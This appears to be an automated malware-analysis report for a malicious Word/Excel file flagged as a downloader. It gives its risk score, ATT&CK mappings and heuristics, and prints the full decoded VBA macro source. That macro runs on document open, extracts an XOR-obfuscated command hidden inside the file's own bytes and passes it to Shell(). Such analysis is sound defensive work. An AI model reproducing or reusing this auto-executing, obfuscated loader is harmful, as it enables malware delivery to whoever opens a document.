MALICIOUS
264
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA code, and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' confirms this auto-executes via Workbook_Open. This suggests the macro is designed to download and execute a second-stage payload, a common technique for malware delivery. The ClamAV detection further supports its malicious nature.
Heuristics 8
-
ClamAV: Doc.Downloader.Generic-7474871-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7474871-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3997 bytes |
SHA-256: d109bc00d7d1269e719960ef3c71344f11004c8e205a0e1a0ee35952245b43cc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
Private Declare PtrSafe Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
#Else
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
#End If
Public Sub kAqnPBIjzTPDrCBgyQ()
Dim fzjHPHAplebeCXOHQeoeI() As Byte
fzjHPHAplebeCXOHQeoeI = qjyIrqWDdBxQoOy(ActiveDocument.FullName)
Dim QFexzTvfVitQPcaTAGolwfxOnF As String
QFexzTvfVitQPcaTAGolwfxOnF = StrConv(fzjHPHAplebeCXOHQeoeI, 64)
Dim UKcjLZlJEDrhGUgjTL
UKcjLZlJEDrhGUgjTL = Split(QFexzTvfVitQPcaTAGolwfxOnF, "CGOxUKUPIdGUIoNOOQKelQUeMaGIAsEwjPaRZjoKnOQCEqYFialbrILMMKKTdmpqzkLSoVOEBZRxZrAvcbAzhDfAdnfpyvGbyAduFfrmlGzrRoMujpQcLQiWekPaQygftPYzogQXKnnAdOIPBKgjEEpIrgquqqwNzuXbqmfdyTrxCISpBayfsXAOAqihQvHtRA")
Dim iMGWDIPwxKipkUqAuTYHRDs As String
Dim ujhfhOEmIwAmGuxKoPua As String
Dim blsXDG As String
ujhfhOEmIwAmGuxKoPua = StrConv(StrConv(UKcjLZlJEDrhGUgjTL(UBound(UKcjLZlJEDrhGUgjTL)), 64), 128)
blsXDG = Mid$(ujhfhOEmIwAmGuxKoPua, 3, Len(ujhfhOEmIwAmGuxKoPua))
iMGWDIPwxKipkUqAuTYHRDs = YHTwdherPxHkRbyQOhgVx("JQHzoFcKLn", blsXDG)
fEbjGsOgdcnBcTbdKnv iMGWDIPwxKipkUqAuTYHRDs, 0
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Private Sub fEbjGsOgdcnBcTbdKnv(ByVal xIkvAPOfmQuLAJyc As String, _
ByVal fdcCtmrCbHgWtkuyFfxtFIQ As VbAppWinStyle)
Dim JTnHBbsvZqFjtVdvTSz As Long
Dim HjTFanUD As Long
On Error GoTo zYJbZoLXdFkfKbbAMjIWAaIHoh
JTnHBbsvZqFjtVdvTSz = Shell(xIkvAPOfmQuLAJyc, fdcCtmrCbHgWtkuyFfxtFIQ)
On Error GoTo 0
DoEvents
HjTFanUD = OpenProcess(&H100000, 0, JTnHBbsvZqFjtVdvTSz)
If HjTFanUD <> 0 Then
WaitForSingleObject HjTFanUD, &HFFFFFFFF
CloseHandle HjTFanUD
End If
Exit Sub
zYJbZoLXdFkfKbbAMjIWAaIHoh:
MsgBox "Error starting task " & _
vbCrLf & _
Err.Description, vbOKOnly Or vbExclamation, _
"Error"
End Sub
Public Function YHTwdherPxHkRbyQOhgVx(FOZkEsXOhDiVna As String, eiypfVRhkibDvDQxKlE As String) As String
Dim exTDLt As Long
Dim pebVN As String
Dim nKZHFryNHObDPCkr As Integer, pXCHjw As Integer, a As Long
For exTDLt = 1 To Len(eiypfVRhkibDvDQxKlE)
a = exTDLt Mod Len(FOZkEsXOhDiVna)
If a = 0 Then a = Len(FOZkEsXOhDiVna)
nKZHFryNHObDPCkr = Asc(Mid$(eiypfVRhkibDvDQxKlE, exTDLt, 1))
pXCHjw = Asc(Mid$(FOZkEsXOhDiVna, a, 1))
pebVN = pebVN + Chr(nKZHFryNHObDPCkr Xor pXCHjw)
Next exTDLt
YHTwdherPxHkRbyQOhgVx = pebVN
End Function
Public Sub Document_Open()
kAqnPBIjzTPDrCBgyQ
End Sub
Public Function qjyIrqWDdBxQoOy(ByVal WCOYvnhnptMqUeTEtk As String) As Byte()
Dim ujhfhOEmIwAmGuxKoPua As Long
Dim blsXDG() As Byte
ujhfhOEmIwAmGuxKoPua = FreeFile
Open WCOYvnhnptMqUeTEtk For Binary Access Read As ujhfhOEmIwAmGuxKoPua
ReDim blsXDG(LOF(ujhfhOEmIwAmGuxKoPua) - 1&) As Byte
Get ujhfhOEmIwAmGuxKoPua, , blsXDG
Close ujhfhOEmIwAmGuxKoPua
qjyIrqWDdBxQoOy = blsXDG
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.